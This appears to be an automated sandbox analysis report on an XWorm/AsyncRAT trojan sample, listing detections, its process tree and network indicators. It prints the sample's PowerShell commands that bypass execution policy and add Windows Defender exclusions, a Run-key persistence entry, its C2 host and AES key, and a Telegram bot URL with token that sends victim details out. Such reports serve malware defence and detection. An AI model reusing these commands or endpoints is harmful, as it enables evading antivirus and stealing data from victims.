Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9RgE5uOJwX.exe

Overview

General Information

Sample name:9RgE5uOJwX.exe
renamed because original name is a hash value
Original sample name:72f5f19b35b22d82d8459f5e0739c248.exe
Analysis ID:1545317
MD5:72f5f19b35b22d82d8459f5e0739c248
SHA1:0218dd2b354dcfdff2a11d06b6cf57f53987e9eb
SHA256:4571751b2b7477fded0012f46aded7c86fb93194980897418c17ac917c4d4cc1
Tags:32AsyncRATexetrojan
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 9RgE5uOJwX.exe (PID: 2732 cmdline: "C:\Users\user\Desktop\9RgE5uOJwX.exe" MD5: 72F5F19B35B22D82D8459F5E0739C248)
    • powershell.exe (PID: 5168 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5268 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MicrosoftClient.exe (PID: 5580 cmdline: "C:\Users\user\AppData\Local\MicrosoftClient.exe" MD5: 72F5F19B35B22D82D8459F5E0739C248)
  • MicrosoftClient.exe (PID: 4048 cmdline: "C:\Users\user\AppData\Local\MicrosoftClient.exe" MD5: 72F5F19B35B22D82D8459F5E0739C248)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["vehicle-temp.gl.at.ply.gg"], "Port": "1930", "Aes key": "<!QAZxcvbnm,./>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
9RgE5uOJwX.exeJoeSecurity_XWormYara detected XWormJoe Security
    9RgE5uOJwX.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      9RgE5uOJwX.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xd79f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xd83c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xd951:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xd244:$cnc4: POST / HTTP/1.1

      PCAP (Network Traffic)

      SourceRuleDescriptionAuthorStrings
      sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\MicrosoftClient.exeJoeSecurity_XWormYara detected XWormJoe Security
          C:\Users\user\AppData\Local\MicrosoftClient.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            C:\Users\user\AppData\Local\MicrosoftClient.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xd79f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0xd83c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0xd951:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xd244:$cnc4: POST / HTTP/1.1

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xf25f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xf2fc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0xf411:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0xed04:$cnc4: POST / HTTP/1.1
              00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xd59f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0xd63c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0xd751:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xd044:$cnc4: POST / HTTP/1.1
                Process Memory Space: 9RgE5uOJwX.exe PID: 2732JoeSecurity_XWormYara detected XWormJoe Security

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0xd79f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0xd83c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0xd951:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0xd244:$cnc4: POST / HTTP/1.1
                      0.0.9RgE5uOJwX.exe.cf0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                        0.0.9RgE5uOJwX.exe.cf0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                          Click to see the 3 entries

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9RgE5uOJwX.exe", ParentImage: C:\Users\user\Desktop\9RgE5uOJwX.exe, ParentProcessId: 2732, ParentProcessName: 9RgE5uOJwX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', ProcessId: 5168, ProcessName: powershell.exe
                          Sigma detected: Change PowerShell Policies to an Insecure Level
                          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9RgE5uOJwX.exe", ParentImage: C:\Users\user\Desktop\9RgE5uOJwX.exe, ParentProcessId: 2732, ParentProcessName: 9RgE5uOJwX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', ProcessId: 5168, ProcessName: powershell.exe
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\MicrosoftClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\9RgE5uOJwX.exe, ProcessId: 2732, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftClient
                          Sigma detected: Powershell Defender Exclusion
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9RgE5uOJwX.exe", ParentImage: C:\Users\user\Desktop\9RgE5uOJwX.exe, ParentProcessId: 2732, ParentProcessName: 9RgE5uOJwX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', ProcessId: 5168, ProcessName: powershell.exe
                          Sigma detected: Non Interactive PowerShell Process Spawned
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9RgE5uOJwX.exe", ParentImage: C:\Users\user\Desktop\9RgE5uOJwX.exe, ParentProcessId: 2732, ParentProcessName: 9RgE5uOJwX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', ProcessId: 5168, ProcessName: powershell.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-30T12:22:53.328109+010028536851A Network Trojan was detected192.168.2.649399149.154.167.220443TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Found malware configuration
                          Source: 9RgE5uOJwX.exeMalware Configuration Extractor: Xworm {"C2 url": ["vehicle-temp.gl.at.ply.gg"], "Port": "1930", "Aes key": "<!QAZxcvbnm,./>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeReversingLabs: Detection: 81%
                          Multi AV Scanner detection for submitted file
                          Source: 9RgE5uOJwX.exeReversingLabs: Detection: 81%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: 9RgE5uOJwX.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 9RgE5uOJwX.exeString decryptor: vehicle-temp.gl.at.ply.gg
                          Source: 9RgE5uOJwX.exeString decryptor: 1930
                          Source: 9RgE5uOJwX.exeString decryptor: <!QAZxcvbnm,./>
                          Source: 9RgE5uOJwX.exeString decryptor: <Xwormmm>
                          Source: 9RgE5uOJwX.exeString decryptor: XWorm V5.6
                          Source: 9RgE5uOJwX.exeString decryptor: USB.exe
                          Source: 9RgE5uOJwX.exeString decryptor: %LocalAppData%
                          Source: 9RgE5uOJwX.exeString decryptor: MicrosoftClient.exe
                          Source: 9RgE5uOJwX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49399 version: TLS 1.2
                          Source: 9RgE5uOJwX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.6:49399 -> 149.154.167.220:443
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: vehicle-temp.gl.at.ply.gg
                          Uses the Telegram API (likely for C&C communication)
                          Source: unknownDNS query: name: api.telegram.org
                          Yara detected Generic Downloader
                          Source: Yara matchFile source: 9RgE5uOJwX.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPED
                          Source: global trafficTCP traffic: 192.168.2.6:49406 -> 147.185.221.23:1930
                          Source: global trafficHTTP traffic detected: GET /bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=7247076886&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AC0ADF584DA274A411213%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K2C7BZM9L%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                          Source: Joe Sandbox ViewIP Address: 147.185.221.23 147.185.221.23
                          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                          Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=7247076886&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AC0ADF584DA274A411213%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K2C7BZM9L%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                          Source: global trafficDNS traffic detected: DNS query: vehicle-temp.gl.at.ply.gg
                          Source: powershell.exe, 00000008.00000002.2468170958.000002A71F4C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                          Source: powershell.exe, 00000008.00000002.2468170958.000002A71F4C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                          Source: powershell.exe, 0000000B.00000002.2648363844.000001867A108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                          Source: powershell.exe, 00000002.00000002.2223406932.0000020090071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2310348325.0000023A11CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2449436475.000002A717021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000002.00000002.2207375824.000002008022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A7071DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: 9RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2207375824.0000020080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A706FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000002.00000002.2207375824.000002008022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A7071DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: powershell.exe, 00000002.00000002.2232053080.00000200F2397000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2232624832.00000200F2687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                          Source: powershell.exe, 00000002.00000002.2232053080.00000200F2397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coiops
                          Source: powershell.exe, 00000002.00000002.2207375824.0000020080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A706FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: 9RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                          Source: 9RgE5uOJwX.exe, MicrosoftClient.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                          Source: 9RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=72470
                          Source: powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 00000002.00000002.2223406932.0000020090071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2310348325.0000023A11CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2449436475.000002A717021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49399 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49399
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49399 version: TLS 1.2

                          Operating System Destruction

                          barindex
                          Protects its processes via BreakOnTermination flag
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: 01 00 00 00 Jump to behavior

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: 9RgE5uOJwX.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeCode function: 0_2_00007FFD343D69360_2_00007FFD343D6936
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeCode function: 0_2_00007FFD343D76E20_2_00007FFD343D76E2
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3440947D2_2_00007FFD3440947D
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD344084F32_2_00007FFD344084F3
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3440B9FA2_2_00007FFD3440B9FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD344025FD2_2_00007FFD344025FD
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD344027932_2_00007FFD34402793
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34405C432_2_00007FFD34405C43
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3440BBFB2_2_00007FFD3440BBFB
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34403FFA2_2_00007FFD34403FFA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34405BFA2_2_00007FFD34405BFA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD343EB9FA5_2_00007FFD343EB9FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD343E0E635_2_00007FFD343E0E63
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD343E5EFA5_2_00007FFD343E5EFA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD343E9EFB5_2_00007FFD343E9EFB
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD343E26F55_2_00007FFD343E26F5
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD343EB7FC5_2_00007FFD343EB7FC
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD343EABF25_2_00007FFD343EABF2
